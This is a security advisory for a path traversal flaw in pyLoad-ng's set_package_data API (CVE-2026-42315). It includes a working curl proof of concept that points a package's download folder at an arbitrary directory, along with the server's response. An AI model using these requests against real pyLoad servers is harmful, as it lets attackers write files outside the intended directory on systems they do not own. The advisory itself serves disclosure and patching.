PT-2026-37264 · Pypi · Pyload-Ng
Published
2026-05-05
·
Updated
2026-05-05
·
CVE-2026-42315
CVSS v3.1
8.1
High
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H |
Summary
No sanitization of package folder name allows writing files anywhere outside the intended download directory.
Affected Component
src/pyload/core/api/ init .py- Function:
set package data()
Details
When passing a folder name in the
set package data() API function call inside the data object with key " folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package.PoC
- Create a package, note response package ID e.g.
5
curl -X 'POST'
'http://localhost:8000/api/add package'
-H 'accept: application/json'
-H 'X-API-Key: <valid api key>'
-H 'Content-Type: application/json'
-d '{
"name": "set package data exploit poc",
"links": [
"http://example.com/file.txt"
],
"dest": 1
}'- Call set package data for this package ID with an arbitrary directory
curl -X 'POST'
'http://localhost:8000/api/set package data'
-H 'accept: */*'
-H 'X-API-Key: <valid api key>'
-H 'Content-Type: application/json'
-d '{
"package id": 5,
"data": {
" folder": "/users/root/"
}
}'- New download folder will be set without any checks
curl -X 'GET'
'http://localhost:8000/api/get queue'
-H 'accept: application/json'
-H 'X-API-Key: <valid api key>'Response:
[
{
"pid": 5,
"name": "set package data exploit poc",
"folder": "/users/root/",
"site": "",
"password": "",
"dest": 1,
"order": 1,
"linksdone": 0,
"sizedone": 0,
"sizetotal": 0,
"linkstotal": 1,
"links": null,
"fids": null
}
]Impact
Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.
Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Pyload-Ng